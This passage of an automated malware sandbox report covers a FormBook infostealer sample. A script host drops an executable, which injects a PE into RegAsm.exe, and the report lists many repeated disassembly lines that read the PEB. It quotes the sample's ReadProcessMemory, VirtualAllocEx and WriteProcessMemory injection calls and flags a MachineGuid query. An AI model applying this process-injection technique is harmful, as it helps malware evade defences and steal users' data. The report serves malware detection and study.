Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C81131 mov eax, dword ptr fs:[00000030h]	3_2_02C81131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C81131 mov eax, dword ptr fs:[00000030h]	3_2_02C81131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB16CF mov eax, dword ptr fs:[00000030h]	3_2_02CB16CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8B6C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8B6C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8B6C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8B6C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8B6C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8B6C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBA6C7 mov ebx, dword ptr fs:[00000030h]	3_2_02CBA6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBA6C7 mov eax, dword ptr fs:[00000030h]	3_2_02CBA6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3F6C7 mov eax, dword ptr fs:[00000030h]	3_2_02D3F6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D416CC mov eax, dword ptr fs:[00000030h]	3_2_02D416CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D416CC mov eax, dword ptr fs:[00000030h]	3_2_02D416CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D416CC mov eax, dword ptr fs:[00000030h]	3_2_02D416CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D416CC mov eax, dword ptr fs:[00000030h]	3_2_02D416CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D006F1 mov eax, dword ptr fs:[00000030h]	3_2_02D006F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D006F1 mov eax, dword ptr fs:[00000030h]	3_2_02D006F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3D6F0 mov eax, dword ptr fs:[00000030h]	3_2_02D3D6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB36EF mov eax, dword ptr fs:[00000030h]	3_2_02CB36EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAD6E0 mov eax, dword ptr fs:[00000030h]	3_2_02CAD6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAD6E0 mov eax, dword ptr fs:[00000030h]	3_2_02CAD6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFE6F2 mov eax, dword ptr fs:[00000030h]	3_2_02CFE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFE6F2 mov eax, dword ptr fs:[00000030h]	3_2_02CFE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFE6F2 mov eax, dword ptr fs:[00000030h]	3_2_02CFE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFE6F2 mov eax, dword ptr fs:[00000030h]	3_2_02CFE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D136EE mov eax, dword ptr fs:[00000030h]	3_2_02D136EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D136EE mov eax, dword ptr fs:[00000030h]	3_2_02D136EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D136EE mov eax, dword ptr fs:[00000030h]	3_2_02D136EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D136EE mov eax, dword ptr fs:[00000030h]	3_2_02D136EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D136EE mov eax, dword ptr fs:[00000030h]	3_2_02D136EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D136EE mov eax, dword ptr fs:[00000030h]	3_2_02D136EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C84690 mov eax, dword ptr fs:[00000030h]	3_2_02C84690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C84690 mov eax, dword ptr fs:[00000030h]	3_2_02C84690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0368C mov eax, dword ptr fs:[00000030h]	3_2_02D0368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0368C mov eax, dword ptr fs:[00000030h]	3_2_02D0368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0368C mov eax, dword ptr fs:[00000030h]	3_2_02D0368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0368C mov eax, dword ptr fs:[00000030h]	3_2_02D0368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7D6AA mov eax, dword ptr fs:[00000030h]	3_2_02C7D6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7D6AA mov eax, dword ptr fs:[00000030h]	3_2_02C7D6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBC6A6 mov eax, dword ptr fs:[00000030h]	3_2_02CBC6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C776B2 mov eax, dword ptr fs:[00000030h]	3_2_02C776B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C776B2 mov eax, dword ptr fs:[00000030h]	3_2_02C776B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C776B2 mov eax, dword ptr fs:[00000030h]	3_2_02C776B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB66B0 mov eax, dword ptr fs:[00000030h]	3_2_02CB66B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9C640 mov eax, dword ptr fs:[00000030h]	3_2_02C9C640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBA660 mov eax, dword ptr fs:[00000030h]	3_2_02CBA660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBA660 mov eax, dword ptr fs:[00000030h]	3_2_02CBA660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB9660 mov eax, dword ptr fs:[00000030h]	3_2_02CB9660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB9660 mov eax, dword ptr fs:[00000030h]	3_2_02CB9660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4866E mov eax, dword ptr fs:[00000030h]	3_2_02D4866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4866E mov eax, dword ptr fs:[00000030h]	3_2_02D4866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB2674 mov eax, dword ptr fs:[00000030h]	3_2_02CB2674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9260B mov eax, dword ptr fs:[00000030h]	3_2_02C9260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9260B mov eax, dword ptr fs:[00000030h]	3_2_02C9260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9260B mov eax, dword ptr fs:[00000030h]	3_2_02C9260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9260B mov eax, dword ptr fs:[00000030h]	3_2_02C9260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9260B mov eax, dword ptr fs:[00000030h]	3_2_02C9260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9260B mov eax, dword ptr fs:[00000030h]	3_2_02C9260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9260B mov eax, dword ptr fs:[00000030h]	3_2_02C9260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFE609 mov eax, dword ptr fs:[00000030h]	3_2_02CFE609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBF603 mov eax, dword ptr fs:[00000030h]	3_2_02CBF603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB1607 mov eax, dword ptr fs:[00000030h]	3_2_02CB1607
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2619 mov eax, dword ptr fs:[00000030h]	3_2_02CC2619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C83616 mov eax, dword ptr fs:[00000030h]	3_2_02C83616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C83616 mov eax, dword ptr fs:[00000030h]	3_2_02C83616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F626 mov eax, dword ptr fs:[00000030h]	3_2_02C7F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F626 mov eax, dword ptr fs:[00000030h]	3_2_02C7F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F626 mov eax, dword ptr fs:[00000030h]	3_2_02C7F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F626 mov eax, dword ptr fs:[00000030h]	3_2_02C7F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F626 mov eax, dword ptr fs:[00000030h]	3_2_02C7F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F626 mov eax, dword ptr fs:[00000030h]	3_2_02C7F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F626 mov eax, dword ptr fs:[00000030h]	3_2_02C7F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F626 mov eax, dword ptr fs:[00000030h]	3_2_02C7F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F626 mov eax, dword ptr fs:[00000030h]	3_2_02C7F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D55636 mov eax, dword ptr fs:[00000030h]	3_2_02D55636
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8262C mov eax, dword ptr fs:[00000030h]	3_2_02C8262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB6620 mov eax, dword ptr fs:[00000030h]	3_2_02CB6620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB8620 mov eax, dword ptr fs:[00000030h]	3_2_02CB8620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9E627 mov eax, dword ptr fs:[00000030h]	3_2_02C9E627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8C7C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C857C0 mov eax, dword ptr fs:[00000030h]	3_2_02C857C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C857C0 mov eax, dword ptr fs:[00000030h]	3_2_02C857C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C857C0 mov eax, dword ptr fs:[00000030h]	3_2_02C857C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA27ED mov eax, dword ptr fs:[00000030h]	3_2_02CA27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA27ED mov eax, dword ptr fs:[00000030h]	3_2_02CA27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA27ED mov eax, dword ptr fs:[00000030h]	3_2_02CA27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8D7E0 mov ecx, dword ptr fs:[00000030h]	3_2_02C8D7E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C847FB mov eax, dword ptr fs:[00000030h]	3_2_02C847FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C847FB mov eax, dword ptr fs:[00000030h]	3_2_02C847FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3F78A mov eax, dword ptr fs:[00000030h]	3_2_02D3F78A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D537B6 mov eax, dword ptr fs:[00000030h]	3_2_02D537B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C807AF mov eax, dword ptr fs:[00000030h]	3_2_02C807AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D097A9 mov eax, dword ptr fs:[00000030h]	3_2_02D097A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAD7B0 mov eax, dword ptr fs:[00000030h]	3_2_02CAD7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F7BA mov eax, dword ptr fs:[00000030h]	3_2_02C7F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F7BA mov eax, dword ptr fs:[00000030h]	3_2_02C7F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F7BA mov eax, dword ptr fs:[00000030h]	3_2_02C7F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F7BA mov eax, dword ptr fs:[00000030h]	3_2_02C7F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F7BA mov eax, dword ptr fs:[00000030h]	3_2_02C7F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F7BA mov eax, dword ptr fs:[00000030h]	3_2_02C7F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F7BA mov eax, dword ptr fs:[00000030h]	3_2_02C7F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F7BA mov eax, dword ptr fs:[00000030h]	3_2_02C7F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F7BA mov eax, dword ptr fs:[00000030h]	3_2_02C7F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0F7AF mov eax, dword ptr fs:[00000030h]	3_2_02D0F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0F7AF mov eax, dword ptr fs:[00000030h]	3_2_02D0F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0F7AF mov eax, dword ptr fs:[00000030h]	3_2_02D0F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0F7AF mov eax, dword ptr fs:[00000030h]	3_2_02D0F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0F7AF mov eax, dword ptr fs:[00000030h]	3_2_02D0F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D04755 mov eax, dword ptr fs:[00000030h]	3_2_02D04755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB674D mov esi, dword ptr fs:[00000030h]	3_2_02CB674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB674D mov eax, dword ptr fs:[00000030h]	3_2_02CB674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB674D mov eax, dword ptr fs:[00000030h]	3_2_02CB674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C93740 mov eax, dword ptr fs:[00000030h]	3_2_02C93740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C93740 mov eax, dword ptr fs:[00000030h]	3_2_02C93740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C93740 mov eax, dword ptr fs:[00000030h]	3_2_02C93740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C80750 mov eax, dword ptr fs:[00000030h]	3_2_02C80750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2750 mov eax, dword ptr fs:[00000030h]	3_2_02CC2750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2750 mov eax, dword ptr fs:[00000030h]	3_2_02CC2750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D53749 mov eax, dword ptr fs:[00000030h]	3_2_02D53749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B765 mov eax, dword ptr fs:[00000030h]	3_2_02C7B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B765 mov eax, dword ptr fs:[00000030h]	3_2_02C7B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B765 mov eax, dword ptr fs:[00000030h]	3_2_02C7B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B765 mov eax, dword ptr fs:[00000030h]	3_2_02C7B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C88770 mov eax, dword ptr fs:[00000030h]	3_2_02C88770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770 mov eax, dword ptr fs:[00000030h]	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C85702 mov eax, dword ptr fs:[00000030h]	3_2_02C85702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C85702 mov eax, dword ptr fs:[00000030h]	3_2_02C85702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C87703 mov eax, dword ptr fs:[00000030h]	3_2_02C87703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBC700 mov eax, dword ptr fs:[00000030h]	3_2_02CBC700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBF71F mov eax, dword ptr fs:[00000030h]	3_2_02CBF71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBF71F mov eax, dword ptr fs:[00000030h]	3_2_02CBF71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C80710 mov eax, dword ptr fs:[00000030h]	3_2_02C80710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB0710 mov eax, dword ptr fs:[00000030h]	3_2_02CB0710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C83720 mov eax, dword ptr fs:[00000030h]	3_2_02C83720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D5B73C mov eax, dword ptr fs:[00000030h]	3_2_02D5B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D5B73C mov eax, dword ptr fs:[00000030h]	3_2_02D5B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D5B73C mov eax, dword ptr fs:[00000030h]	3_2_02D5B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D5B73C mov eax, dword ptr fs:[00000030h]	3_2_02D5B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9F720 mov eax, dword ptr fs:[00000030h]	3_2_02C9F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9F720 mov eax, dword ptr fs:[00000030h]	3_2_02C9F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9F720 mov eax, dword ptr fs:[00000030h]	3_2_02C9F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBC720 mov eax, dword ptr fs:[00000030h]	3_2_02CBC720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBC720 mov eax, dword ptr fs:[00000030h]	3_2_02CBC720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8973A mov eax, dword ptr fs:[00000030h]	3_2_02C8973A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8973A mov eax, dword ptr fs:[00000030h]	3_2_02C8973A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB273C mov eax, dword ptr fs:[00000030h]	3_2_02CB273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB273C mov ecx, dword ptr fs:[00000030h]	3_2_02CB273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB273C mov eax, dword ptr fs:[00000030h]	3_2_02CB273C

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\System32\wscript.exe

File created: temp_executable.exe.0.dr

Jump to dropped file

.NET source code references suspicious native API functions

Source: temp_executable.exe.0.dr, ProcessExecutor.cs	Reference to suspicious API methods: App.ReadProcessMemory(Settings.pi.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
Source: temp_executable.exe.0.dr, ProcessExecutor.cs	Reference to suspicious API methods: App.VirtualAllocEx(Settings.pi.ProcessHandle, num2, length, 12288, 64)
Source: temp_executable.exe.0.dr, ProcessExecutor.cs	Reference to suspicious API methods: App.WriteProcessMemory(Settings.pi.ProcessHandle, num4, payload, bufferSize, ref bytesRead)

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A90008	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\temp_executable.exe VolumeInformation

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
